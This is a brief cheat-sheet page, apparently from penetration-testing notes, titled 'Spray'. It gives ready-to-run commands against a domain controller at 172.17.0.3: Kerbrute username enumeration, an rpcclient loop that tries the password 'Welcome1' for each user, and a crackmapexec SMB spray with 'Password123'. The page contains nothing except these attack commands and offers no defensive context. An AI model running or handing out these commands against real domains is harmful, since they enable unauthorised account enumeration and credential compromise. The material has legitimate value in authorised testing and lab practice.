Spray

Kerbrute

kerbrute userenum -d qu35t.pw --dc 172.17.0.3 users.txt

Rpcclient

for u in $(cat valid_users.txt);do rpcclient -U "$u%Welcome1" -c "getusername;quit" 172.17.0.3 | grep Authority; done

Crackmapexec

crackmapexec smb 172.17.0.3 -u valid_users.txt -p Password123 --continue-on-success | grep +

Last updated